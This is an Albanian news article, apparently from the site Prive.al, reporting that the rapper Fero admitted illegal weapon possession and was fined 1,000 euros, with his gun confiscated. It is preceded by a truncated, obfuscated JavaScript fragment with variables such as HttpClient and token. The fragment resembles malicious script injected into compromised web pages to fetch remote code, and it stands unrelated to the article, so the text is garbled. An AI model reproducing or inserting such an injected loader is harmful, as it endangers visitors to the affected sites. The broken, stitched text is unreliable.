;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ky është vendimi i gjykatës për rastin e Feros

By

Në qershor, mungesa e të akuzuarit për sulm, Mehmet Elshani, ka bërë që të shtyhet seanca fillestare e paraparë, në rastin ku së bashku me të po akuzohen edhe Avudllah Islami dhe Feronit Shabani, i njohur me emrin artistik Fero.

Islami po akuzohet për kanosje me përdorim të mjetit të rrezikshëm, kurse Shabani për armëmbajtje pa leje, raportoi “Betimi për Drejtësi”.

Në këto rrethana, seanca ishte shtyrë për 8 shtator, në ora 13:30.

Ashtu siç ishte raportuar nga “Betimi për Drejtësi” seanca po mbahet sot dhe Prive ka arritur të sigurojë fotografi nga procesi gjyqësor.

Burime të Prive.al mësuan se Feronit Shabani apo i njohur me emrin artistik Fero ka pranuar fajësinë e tij, ai është dënuar me 1 mijë euro gjobë, si dhe i është konfiskuar arma.

Detajet e tjera dhe deklaratën e Feros gjatë seancës gjyqësore, të gjitha këto do t’i kuptoni detajisht në edicionin e parë të sezonit të ri në Prive.

Artikuj të ngjashëm